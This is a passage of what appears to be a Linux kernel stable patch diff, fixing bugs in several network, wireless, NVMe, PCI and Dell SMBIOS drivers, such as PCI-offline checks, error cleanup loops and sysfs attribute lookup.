+@@ -361,11 +358,13 @@ ice_realloc_rx_xdp_bufs(struct ice_rx_ring *rx_ring, bool pool_present)
+ int ice_realloc_zc_buf(struct ice_vsi *vsi, bool zc)
+ {
+ 	struct ice_rx_ring *rx_ring;
+-	unsigned long q;
++	uint i;
++
++	ice_for_each_rxq(vsi, i) {
++		rx_ring = vsi->rx_rings[i];
++		if (!rx_ring->xsk_pool)
++			continue;
+ 
+-	for_each_set_bit(q, vsi->af_xdp_zc_qps,
+-			 max_t(int, vsi->alloc_txq, vsi->alloc_rxq)) {
+-		rx_ring = vsi->rx_rings[q];
+ 		if (ice_realloc_rx_xdp_bufs(rx_ring, zc))
+ 			return -ENOMEM;
+ 	}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 91a4ea529d077..00ef6d201b973 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -2506,7 +2506,17 @@ static int npc_mcam_alloc_entries(struct npc_mcam *mcam, u16 pcifunc,
+ 	 * - when available free entries are less.
+ 	 * Lower priority ones out of avaialble free entries are always
+ 	 * chosen when 'high vs low' question arises.
++	 *
++	 * For a VF base MCAM match rule is set by its PF. And all the
++	 * further MCAM rules installed by VF on its own are
++	 * concatenated with the base rule set by its PF. Hence PF entries
++	 * should be at lower priority compared to VF entries. Otherwise
++	 * base rule is hit always and rules installed by VF will be of
++	 * no use. Hence if the request is from PF then allocate low
++	 * priority entries.
+ 	 */
++	if (!(pcifunc & RVU_PFVF_FUNC_MASK))
++		goto lprio_alloc;
+ 
+ 	/* Get the search range for priority allocation request */
+ 	if (req->priority) {
+@@ -2515,17 +2525,6 @@ static int npc_mcam_alloc_entries(struct npc_mcam *mcam, u16 pcifunc,
+ 		goto alloc;
+ 	}
+ 
+-	/* For a VF base MCAM match rule is set by its PF. And all the
+-	 * further MCAM rules installed by VF on its own are
+-	 * concatenated with the base rule set by its PF. Hence PF entries
+-	 * should be at lower priority compared to VF entries. Otherwise
+-	 * base rule is hit always and rules installed by VF will be of
+-	 * no use. Hence if the request is from PF and NOT a priority
+-	 * allocation request then allocate low priority entries.
+-	 */
+-	if (!(pcifunc & RVU_PFVF_FUNC_MASK))
+-		goto lprio_alloc;
+-
+ 	/* Find out the search range for non-priority allocation request
+ 	 *
+ 	 * Get MCAM free entry count in middle zone.
+@@ -2555,6 +2554,18 @@ static int npc_mcam_alloc_entries(struct npc_mcam *mcam, u16 pcifunc,
+ 		reverse = true;
+ 		start = 0;
+ 		end = mcam->bmap_entries;
++		/* Ensure PF requests are always at bottom and if PF requests
++		 * for higher/lower priority entry wrt reference entry then
++		 * honour that criteria and start search for entries from bottom
++		 * and not in mid zone.
++		 */
++		if (!(pcifunc & RVU_PFVF_FUNC_MASK) &&
++		    req->priority == NPC_MCAM_HIGHER_PRIO)
++			end = req->ref_entry;
++
++		if (!(pcifunc & RVU_PFVF_FUNC_MASK) &&
++		    req->priority == NPC_MCAM_LOWER_PRIO)
++			start = req->ref_entry;
+ 	}
+ 
+ alloc:
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index e2f134e1d9fcf..4c0eac83546de 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4587,7 +4587,7 @@ static netdev_features_t mlx5e_tunnel_features_check(struct mlx5e_priv *priv,
+ 
+ 		/* Verify if UDP port is being offloaded by HW */
+ 		if (mlx5_vxlan_lookup_port(priv->mdev->vxlan, port))
+-			return features;
++			return vxlan_features_check(skb, features);
+ 
+ #if IS_ENABLED(CONFIG_GENEVE)
+ 		/* Support Geneve offload for default UDP port */
+@@ -4613,7 +4613,6 @@ netdev_features_t mlx5e_features_check(struct sk_buff *skb,
+ 	struct mlx5e_priv *priv = netdev_priv(netdev);
+ 
+ 	features = vlan_features_check(skb, features);
+-	features = vxlan_features_check(skb, features);
+ 
+ 	/* Validate if the tunneled packet is being offloaded by HW */
+ 	if (skb->encapsulation &&
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw.c b/drivers/net/ethernet/mellanox/mlx5/core/fw.c
+index f34e758a2f1f6..9e26dda93f8ee 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fw.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fw.c
+@@ -379,6 +379,10 @@ int mlx5_cmd_fast_teardown_hca(struct mlx5_core_dev *dev)
+ 	do {
+ 		if (mlx5_get_nic_state(dev) == MLX5_NIC_IFC_DISABLED)
+ 			break;
++		if (pci_channel_offline(dev->pdev)) {
++			mlx5_core_err(dev, "PCI channel offline, stop waiting for NIC IFC\n");
++			return -EACCES;
++		}
+ 
+ 		cond_resched();
+ 	} while (!time_after(jiffies, end));
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/health.c b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+index e42e4ac231c64..65483dab90573 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/health.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+@@ -260,6 +260,10 @@ void mlx5_error_sw_reset(struct mlx5_core_dev *dev)
+ 	do {
+ 		if (mlx5_get_nic_state(dev) == MLX5_NIC_IFC_DISABLED)
+ 			break;
++		if (pci_channel_offline(dev->pdev)) {
++			mlx5_core_err(dev, "PCI channel offline, stop waiting for NIC IFC\n");
++			goto unlock;
++		}
+ 
+ 		msleep(20);
+ 	} while (!time_after(jiffies, end));
+@@ -325,6 +329,14 @@ int mlx5_health_wait_pci_up(struct mlx5_core_dev *dev)
+ 	while (sensor_pci_not_working(dev)) {
+ 		if (time_after(jiffies, end))
+ 			return -ETIMEDOUT;
++		if (test_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state)) {
++			mlx5_core_warn(dev, "device is being removed, stop waiting for PCI\n");
++			return -ENODEV;
++		}
++		if (pci_channel_offline(dev->pdev)) {
++			mlx5_core_err(dev, "PCI channel offline, stop waiting for PCI\n");
++			return -EACCES;
++		}
+ 		msleep(100);
+ 	}
+ 	return 0;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
+index 7d9bbb494d95b..005661248c7e9 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
+@@ -88,9 +88,13 @@ static int mlx5_lag_create_port_sel_table(struct mlx5_lag *ldev,
+ 								      &dest, 1);
+ 			if (IS_ERR(lag_definer->rules[idx])) {
+ 				err = PTR_ERR(lag_definer->rules[idx]);
+-				while (i--)
+-					while (j--)
++				do {
++					while (j--) {
++						idx = i * ldev->buckets + j;
+ 						mlx5_del_flow_rules(lag_definer->rules[idx]);
++					}
++					j = ldev->buckets;
++				} while (i--);
+ 				goto destroy_fg;
+ 			}
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/pci_vsc.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/pci_vsc.c
+index 6b774e0c27665..d0b595ba61101 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/pci_vsc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/pci_vsc.c
+@@ -74,6 +74,10 @@ int mlx5_vsc_gw_lock(struct mlx5_core_dev *dev)
+ 			ret = -EBUSY;
+ 			goto pci_unlock;
+ 		}
++		if (pci_channel_offline(dev->pdev)) {
++			ret = -EACCES;
++			goto pci_unlock;
++		}
+ 
+ 		/* Check if semaphore is already locked */
+ 		ret = vsc_read(dev, VSC_SEMAPHORE_OFFSET, &lock_val);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 6ab0642e9de78..67849b1c0bb71 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1093,7 +1093,7 @@ static void mlx5_cleanup_once(struct mlx5_core_dev *dev)
+ 	mlx5_devcom_unregister_device(dev->priv.devcom);
+ }
+ 
+-static int mlx5_function_setup(struct mlx5_core_dev *dev, bool boot, u64 timeout)
++static int mlx5_function_enable(struct mlx5_core_dev *dev, bool boot, u64 timeout)
+ {
+ 	int err;
+ 
+@@ -1158,28 +1158,56 @@ static int mlx5_function_setup(struct mlx5_core_dev *dev, bool boot, u64 timeout
+ 		goto reclaim_boot_pages;
+ 	}
+ 
++	return 0;
++
++reclaim_boot_pages:
++	mlx5_reclaim_startup_pages(dev);
++err_disable_hca:
++	mlx5_core_disable_hca(dev, 0);
++stop_health_poll:
++	mlx5_stop_health_poll(dev, boot);
++err_cmd_cleanup:
++	mlx5_cmd_set_state(dev, MLX5_CMDIF_STATE_DOWN);
++	mlx5_cmd_cleanup(dev);
++
++	return err;
++}
++
++static void mlx5_function_disable(struct mlx5_core_dev *dev, bool boot)
++{
++	mlx5_reclaim_startup_pages(dev);
++	mlx5_core_disable_hca(dev, 0);
++	mlx5_stop_health_poll(dev, boot);
++	mlx5_cmd_set_state(dev, MLX5_CMDIF_STATE_DOWN);
++	mlx5_cmd_cleanup(dev);
++}
++
++static int mlx5_function_open(struct mlx5_core_dev *dev)
++{
++	int err;
++
+ 	err = set_hca_ctrl(dev);
+ 	if (err) {
+ 		mlx5_core_err(dev, "set_hca_ctrl failed\n");
+-		goto reclaim_boot_pages;
++		return err;
+ 	}
+ 
+ 	err = set_hca_cap(dev);
+ 	if (err) {
+ 		mlx5_core_err(dev, "set_hca_cap failed\n");
+-		goto reclaim_boot_pages;
++		return err;
+ 	}
+ 
+ 	err = mlx5_satisfy_startup_pages(dev, 0);
+ 	if (err) {
+ 		mlx5_core_err(dev, "failed to allocate init pages\n");
+-		goto reclaim_boot_pages;
++		return err;
+ 	}
+ 
+ 	err = mlx5_cmd_init_hca(dev, sw_owner_id);
+ 	if (err) {
+ 		mlx5_core_err(dev, "init hca failed\n");
+-		goto reclaim_boot_pages;
++		return err;
+ 	}
+ 
+ 	mlx5_set_driver_version(dev);
+@@ -1187,26 +1215,13 @@ static int mlx5_function_setup(struct mlx5_core_dev *dev, bool boot, u64 timeout
+ 	err = mlx5_query_hca_caps(dev);
+ 	if (err) {
+ 		mlx5_core_err(dev, "query hca failed\n");
+-		goto reclaim_boot_pages;
++		return err;
+ 	}
+ 	mlx5_start_health_fw_log_up(dev);
+-
+ 	return 0;
+-
+-reclaim_boot_pages:
+-	mlx5_reclaim_startup_pages(dev);
+-err_disable_hca:
+-	mlx5_core_disable_hca(dev, 0);
+-stop_health_poll:
+-	mlx5_stop_health_poll(dev, boot);
+-err_cmd_cleanup:
+-	mlx5_cmd_set_state(dev, MLX5_CMDIF_STATE_DOWN);
+-	mlx5_cmd_cleanup(dev);
+-
+-	return err;
+ }
+ 
+-static int mlx5_function_teardown(struct mlx5_core_dev *dev, bool boot)
++static int mlx5_function_close(struct mlx5_core_dev *dev)
+ {
+ 	int err;
+ 
+@@ -1215,15 +1230,36 @@ static int mlx5_function_teardown(struct mlx5_core_dev *dev, bool boot)
+ 		mlx5_core_err(dev, "tear_down_hca failed, skip cleanup\n");
+ 		return err;
+ 	}
+-	mlx5_reclaim_startup_pages(dev);
+-	mlx5_core_disable_hca(dev, 0);
+-	mlx5_stop_health_poll(dev, boot);
+-	mlx5_cmd_set_state(dev, MLX5_CMDIF_STATE_DOWN);
+-	mlx5_cmd_cleanup(dev);
+ 
+ 	return 0;
+ }
+ 
++static int mlx5_function_setup(struct mlx5_core_dev *dev, bool boot, u64 timeout)
++{
++	int err;
++
++	err = mlx5_function_enable(dev, boot, timeout);
++	if (err)
++		return err;
++
++	err = mlx5_function_open(dev);
++	if (err)
++		mlx5_function_disable(dev, boot);
++	return err;
++}
++
++static int mlx5_function_teardown(struct mlx5_core_dev *dev, bool boot)
++{
++	int err = mlx5_function_close(dev);
++
++	if (!err)
++		mlx5_function_disable(dev, boot);
++	else
++		mlx5_stop_health_poll(dev, boot);
++
++	return err;
++}
++
+ static int mlx5_load(struct mlx5_core_dev *dev)
+ {
+ 	int err;
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index d33cf8ee7c336..d34aea85f8a69 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -292,10 +292,8 @@ static int ionic_qcq_enable(struct ionic_qcq *qcq)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (qcq->napi.poll)
+-		napi_enable(&qcq->napi);
+-
+ 	if (qcq->flags & IONIC_QCQ_F_INTR) {
++		napi_enable(&qcq->napi);
+ 		irq_set_affinity_hint(qcq->intr.vector,
+ 				      &qcq->intr.affinity_mask);
+ 		ionic_intr_mask(idev->intr_ctrl, qcq->intr.index,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+index 390c900832cd2..074ff289eaf25 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+@@ -343,10 +343,11 @@ static int tc_setup_cbs(struct stmmac_priv *priv,
+ 			struct tc_cbs_qopt_offload *qopt)
+ {
+ 	u32 tx_queues_count = priv->plat->tx_queues_to_use;
++	s64 port_transmit_rate_kbps;
+ 	u32 queue = qopt->queue;
+-	u32 ptr, speed_div;
+ 	u32 mode_to_use;
+ 	u64 value;
++	u32 ptr;
+ 	int ret;
+ 
+ 	/* Queue 0 is not AVB capable */
+@@ -355,30 +356,26 @@ static int tc_setup_cbs(struct stmmac_priv *priv,
+ 	if (!priv->dma_cap.av)
+ 		return -EOPNOTSUPP;
+ 
++	port_transmit_rate_kbps = qopt->idleslope - qopt->sendslope;
++
+ 	/* Port Transmit Rate and Speed Divider */
+-	switch (priv->speed) {
++	switch (div_s64(port_transmit_rate_kbps, 1000)) {
+ 	case SPEED_10000:
+-		ptr = 32;
+-		speed_div = 10000000;
+-		break;
+ 	case SPEED_5000:
+ 		ptr = 32;
+-		speed_div = 5000000;
+ 		break;
+ 	case SPEED_2500:
+-		ptr = 8;
+-		speed_div = 2500000;
+-		break;
+ 	case SPEED_1000:
+ 		ptr = 8;
+-		speed_div = 1000000;
+ 		break;
+ 	case SPEED_100:
+ 		ptr = 4;
+-		speed_div = 100000;
+ 		break;
+ 	default:
+-		return -EOPNOTSUPP;
++		netdev_err(priv->dev,
++			   "Invalid portTransmitRate %lld (idleSlope - sendSlope)\n",
++			   port_transmit_rate_kbps);
++		return -EINVAL;
+ 	}
+ 
+ 	mode_to_use = priv->plat->tx_queues_cfg[queue].mode_to_use;
+@@ -398,10 +395,10 @@ static int tc_setup_cbs(struct stmmac_priv *priv,
+ 	}
+ 
+ 	/* Final adjustments for HW */
+-	value = div_s64(qopt->idleslope * 1024ll * ptr, speed_div);
++	value = div_s64(qopt->idleslope * 1024ll * ptr, port_transmit_rate_kbps);
+ 	priv->plat->tx_queues_cfg[queue].idle_slope = value & GENMASK(31, 0);
+ 
+-	value = div_s64(-qopt->sendslope * 1024ll * ptr, speed_div);
++	value = div_s64(-qopt->sendslope * 1024ll * ptr, port_transmit_rate_kbps);
+ 	priv->plat->tx_queues_cfg[queue].send_slope = value & GENMASK(31, 0);
+ 
+ 	value = qopt->hicredit * 1024ll * 8;
+diff --git a/drivers/net/geneve.c b/drivers/net/geneve.c
+index 488ca1c854962..c4a49a75250e3 100644
+--- a/drivers/net/geneve.c
++++ b/drivers/net/geneve.c
+@@ -919,6 +919,7 @@ static int geneve_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 			   struct geneve_dev *geneve,
+ 			   const struct ip_tunnel_info *info)
+ {
++	bool inner_proto_inherit = geneve->cfg.inner_proto_inherit;
+ 	bool xnet = !net_eq(geneve->net, dev_net(geneve->dev));
+ 	struct geneve_sock *gs4 = rcu_dereference(geneve->sock4);
+ 	const struct ip_tunnel_key *key = &info->key;
+@@ -930,7 +931,7 @@ static int geneve_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 	__be16 sport;
+ 	int err;
+ 
+-	if (!skb_vlan_inet_prepare(skb))
++	if (!skb_vlan_inet_prepare(skb, inner_proto_inherit))
+ 		return -EINVAL;
+ 
+ 	sport = udp_flow_src_port(geneve->net, skb, 1, USHRT_MAX, true);
+@@ -1003,7 +1004,7 @@ static int geneve_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 	}
+ 
+ 	err = geneve_build_skb(&rt->dst, skb, info, xnet, sizeof(struct iphdr),
+-			       geneve->cfg.inner_proto_inherit);
++			       inner_proto_inherit);
+ 	if (unlikely(err))
+ 		return err;
+ 
+@@ -1019,6 +1020,7 @@ static int geneve6_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 			    struct geneve_dev *geneve,
+ 			    const struct ip_tunnel_info *info)
+ {
++	bool inner_proto_inherit = geneve->cfg.inner_proto_inherit;
+ 	bool xnet = !net_eq(geneve->net, dev_net(geneve->dev));
+ 	struct geneve_sock *gs6 = rcu_dereference(geneve->sock6);
+ 	const struct ip_tunnel_key *key = &info->key;
+@@ -1028,7 +1030,7 @@ static int geneve6_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 	__be16 sport;
+ 	int err;
+ 
+-	if (!skb_vlan_inet_prepare(skb))
++	if (!skb_vlan_inet_prepare(skb, inner_proto_inherit))
+ 		return -EINVAL;
+ 
+ 	sport = udp_flow_src_port(geneve->net, skb, 1, USHRT_MAX, true);
+@@ -1083,7 +1085,7 @@ static int geneve6_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 		ttl = ttl ? : ip6_dst_hoplimit(dst);
+ 	}
+ 	err = geneve_build_skb(dst, skb, info, xnet, sizeof(struct ipv6hdr),
+-			       geneve->cfg.inner_proto_inherit);
++			       inner_proto_inherit);
+ 	if (unlikely(err))
+ 		return err;
+ 
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index 9b1403291d921..06dce78d7b0c9 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -2150,8 +2150,7 @@ static void sfp_sm_module(struct sfp *sfp, unsigned int event)
+ 
+ 	/* Handle remove event globally, it resets this state machine */
+ 	if (event == SFP_E_REMOVE) {
+-		if (sfp->sm_mod_state > SFP_MOD_PROBE)
+-			sfp_sm_mod_remove(sfp);
++		sfp_sm_mod_remove(sfp);
+ 		sfp_sm_mod_next(sfp, SFP_MOD_EMPTY, 0);
+ 		return;
+ 	}
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index a7ae68f490c4c..61224a5a877cb 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -1493,6 +1493,10 @@ static bool vxlan_snoop(struct net_device *dev,
+ 	struct vxlan_fdb *f;
+ 	u32 ifindex = 0;
+ 
++	/* Ignore packets from invalid src-address */
++	if (!is_valid_ether_addr(src_mac))
++		return true;
++
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	if (src_ip->sa.sa_family == AF_INET6 &&
+ 	    (ipv6_addr_type(&src_ip->sin6.sin6_addr) & IPV6_ADDR_LINKLOCAL))
+diff --git a/drivers/net/wireless/ath/ath10k/Kconfig b/drivers/net/wireless/ath/ath10k/Kconfig
+index ca007b800f756..02ca6f8d788d8 100644
+--- a/drivers/net/wireless/ath/ath10k/Kconfig
++++ b/drivers/net/wireless/ath/ath10k/Kconfig
+@@ -44,6 +44,7 @@ config ATH10K_SNOC
+ 	tristate "Qualcomm ath10k SNOC support"
+ 	depends on ATH10K
+ 	depends on ARCH_QCOM || COMPILE_TEST
++	depends on QCOM_RPROC_COMMON || QCOM_RPROC_COMMON=n
+ 	select QCOM_SCM
+ 	select QCOM_QMI_HELPERS
+ 	help
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-drv.c b/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
+index 5eba1a355f043..024c37062a60b 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
+@@ -1750,8 +1750,8 @@ struct iwl_drv *iwl_drv_start(struct iwl_trans *trans)
+ err_fw:
+ #ifdef CONFIG_IWLWIFI_DEBUGFS
+ 	debugfs_remove_recursive(drv->dbgfs_drv);
+-	iwl_dbg_tlv_free(drv->trans);
+ #endif
++	iwl_dbg_tlv_free(drv->trans);
+ 	kfree(drv);
+ err:
+ 	return ERR_PTR(ret);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+index 2e3c98eaa400c..668bb9ce293db 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+@@ -91,20 +91,10 @@ void iwl_mvm_mfu_assert_dump_notif(struct iwl_mvm *mvm,
+ {
+ 	struct iwl_rx_packet *pkt = rxb_addr(rxb);
+ 	struct iwl_mfu_assert_dump_notif *mfu_dump_notif = (void *)pkt->data;
+-	__le32 *dump_data = mfu_dump_notif->data;
+-	int n_words = le32_to_cpu(mfu_dump_notif->data_size) / sizeof(__le32);
+-	int i;
+ 
+ 	if (mfu_dump_notif->index_num == 0)
+ 		IWL_INFO(mvm, "MFUART assert id 0x%x occurred\n",
+ 			 le32_to_cpu(mfu_dump_notif->assert_id));
+-
+-	for (i = 0; i < n_words; i++)
+-		IWL_DEBUG_INFO(mvm,
+-			       "MFUART assert dump, dword %u: 0x%08x\n",
+-			       le16_to_cpu(mfu_dump_notif->index_num) *
+-			       n_words + i,
+-			       le32_to_cpu(dump_data[i]));
+ }
+ 
+ static bool iwl_alive_fn(struct iwl_notif_wait_data *notif_wait,
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rs.h b/drivers/net/wireless/intel/iwlwifi/mvm/rs.h
+index b7bc8c1b2ddae..00f04f675cbbb 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rs.h
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rs.h
+@@ -123,13 +123,8 @@ enum {
+ 
+ #define LINK_QUAL_AGG_FRAME_LIMIT_DEF	(63)
+ #define LINK_QUAL_AGG_FRAME_LIMIT_MAX	(63)
+-/*
+- * FIXME - various places in firmware API still use u8,
+- * e.g. LQ command and SCD config command.
+- * This should be 256 instead.
+- */
+-#define LINK_QUAL_AGG_FRAME_LIMIT_GEN2_DEF	(255)
+-#define LINK_QUAL_AGG_FRAME_LIMIT_GEN2_MAX	(255)
++#define LINK_QUAL_AGG_FRAME_LIMIT_GEN2_DEF	(64)
++#define LINK_QUAL_AGG_FRAME_LIMIT_GEN2_MAX	(64)
+ #define LINK_QUAL_AGG_FRAME_LIMIT_MIN	(0)
+ 
+ #define LQ_SIZE		2	/* 2 mode tables:  "Active" and "Search" */
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+index b20d64dbba1ad..a7a29f1659ea6 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+@@ -1298,7 +1298,7 @@ static void iwl_mvm_scan_umac_dwell(struct iwl_mvm *mvm,
+ 		if (IWL_MVM_ADWELL_MAX_BUDGET)
+ 			cmd->v7.adwell_max_budget =
+ 				cpu_to_le16(IWL_MVM_ADWELL_MAX_BUDGET);
+-		else if (params->ssids && params->ssids[0].ssid_len)
++		else if (params->n_ssids && params->ssids[0].ssid_len)
+ 			cmd->v7.adwell_max_budget =
+ 				cpu_to_le16(IWL_SCAN_ADWELL_MAX_BUDGET_DIRECTED_SCAN);
+ 		else
+@@ -1400,7 +1400,7 @@ iwl_mvm_scan_umac_dwell_v11(struct iwl_mvm *mvm,
+ 	if (IWL_MVM_ADWELL_MAX_BUDGET)
+ 		general_params->adwell_max_budget =
+ 			cpu_to_le16(IWL_MVM_ADWELL_MAX_BUDGET);
+-	else if (params->ssids && params->ssids[0].ssid_len)
++	else if (params->n_ssids && params->ssids[0].ssid_len)
+ 		general_params->adwell_max_budget =
+ 			cpu_to_le16(IWL_SCAN_ADWELL_MAX_BUDGET_DIRECTED_SCAN);
+ 	else
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_devlink.c b/drivers/net/wwan/iosm/iosm_ipc_devlink.c
+index 2fe724d623c06..33c5a46f1b922 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_devlink.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_devlink.c
+@@ -210,7 +210,7 @@ static int ipc_devlink_create_region(struct iosm_devlink *devlink)
+ 			rc = PTR_ERR(devlink->cd_regions[i]);
+ 			dev_err(devlink->dev, "Devlink region fail,err %d", rc);
+ 			/* Delete previously created regions */
+-			for ( ; i >= 0; i--)
++			for (i--; i >= 0; i--)
+ 				devlink_region_destroy(devlink->cd_regions[i]);
+ 			goto region_create_fail;
+ 		}
+diff --git a/drivers/nvme/target/passthru.c b/drivers/nvme/target/passthru.c
+index a0a292d49588c..dc756a1c9d0e3 100644
+--- a/drivers/nvme/target/passthru.c
++++ b/drivers/nvme/target/passthru.c
+@@ -226,13 +226,13 @@ static void nvmet_passthru_execute_cmd_work(struct work_struct *w)
+ 	    req->cmd->common.opcode == nvme_admin_identify) {
+ 		switch (req->cmd->identify.cns) {
+ 		case NVME_ID_CNS_CTRL:
+-			nvmet_passthru_override_id_ctrl(req);
++			status = nvmet_passthru_override_id_ctrl(req);
+ 			break;
+ 		case NVME_ID_CNS_NS:
+-			nvmet_passthru_override_id_ns(req);
++			status = nvmet_passthru_override_id_ns(req);
+ 			break;
+ 		case NVME_ID_CNS_NS_DESC_LIST:
+-			nvmet_passthru_override_id_descs(req);
++			status = nvmet_passthru_override_id_descs(req);
+ 			break;
+ 		}
+ 	} else if (status < 0)
+diff --git a/drivers/pci/controller/pcie-rockchip-ep.c b/drivers/pci/controller/pcie-rockchip-ep.c
+index 0af0e965fb57e..1e3c3192d122c 100644
+--- a/drivers/pci/controller/pcie-rockchip-ep.c
++++ b/drivers/pci/controller/pcie-rockchip-ep.c
+@@ -98,10 +98,8 @@ static int rockchip_pcie_ep_write_header(struct pci_epc *epc, u8 fn, u8 vfn,
+ 
+ 	/* All functions share the same vendor ID with function 0 */
+ 	if (fn == 0) {
+-		u32 vid_regs = (hdr->vendorid & GENMASK(15, 0)) |
+-			       (hdr->subsys_vendor_id & GENMASK(31, 16)) << 16;
+-
+-		rockchip_pcie_write(rockchip, vid_regs,
++		rockchip_pcie_write(rockchip,
++				    hdr->vendorid | hdr->subsys_vendor_id << 16,
+ 				    PCIE_CORE_CONFIG_VENDOR);
+ 	}
+ 
+diff --git a/drivers/platform/x86/dell/dell-smbios-base.c b/drivers/platform/x86/dell/dell-smbios-base.c
+index e61bfaf8b5c48..86b95206cb1bd 100644
+--- a/drivers/platform/x86/dell/dell-smbios-base.c
++++ b/drivers/platform/x86/dell/dell-smbios-base.c
+@@ -11,6 +11,7 @@
+  */
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
++#include <linux/container_of.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/capability.h>
+@@ -25,11 +26,16 @@ static u32 da_supported_commands;
+ static int da_num_tokens;
+ static struct platform_device *platform_device;
+ static struct calling_interface_token *da_tokens;
+-static struct device_attribute *token_location_attrs;
+-static struct device_attribute *token_value_attrs;
++static struct token_sysfs_data *token_entries;
+ static struct attribute **token_attrs;
+ static DEFINE_MUTEX(smbios_mutex);
+ 
++struct token_sysfs_data {
++	struct device_attribute location_attr;
++	struct device_attribute value_attr;
++	struct calling_interface_token *token;
++};
++
+ struct smbios_device {
+ 	struct list_head list;
+ 	struct device *device;
+@@ -416,47 +422,26 @@ static void __init find_tokens(const struct dmi_header *dm, void *dummy)
+ 	}
+ }
+ 
+-static int match_attribute(struct device *dev,
+-			   struct device_attribute *attr)
+-{
+-	int i;
+-
+-	for (i = 0; i < da_num_tokens * 2; i++) {
+-		if (!token_attrs[i])
+-			continue;
+-		if (strcmp(token_attrs[i]->name, attr->attr.name) == 0)
+-			return i/2;
+-	}
+-	dev_dbg(dev, "couldn't match: %s\n", attr->attr.name);
+-	return -EINVAL;
+-}
+-
+ static ssize_t location_show(struct device *dev,
+ 			     struct device_attribute *attr, char *buf)
+ {
+-	int i;
++	struct token_sysfs_data *data = container_of(attr, struct token_sysfs_data, location_attr);
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+ 
+-	i = match_attribute(dev, attr);
+-	if (i > 0)
+-		return sysfs_emit(buf, "%08x", da_tokens[i].location);
+-	return 0;
++	return sysfs_emit(buf, "%08x", data->token->location);
+ }
+ 
+ static ssize_t value_show(struct device *dev,
+ 			  struct device_attribute *attr, char *buf)
+ {
+-	int i;
++	struct token_sysfs_data *data = container_of(attr, struct token_sysfs_data, value_attr);
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+ 
+-	i = match_attribute(dev, attr);
+-	if (i > 0)
+-		return sysfs_emit(buf, "%08x", da_tokens[i].value);
+-	return 0;
++	return sysfs_emit(buf, "%08x", data->token->value);
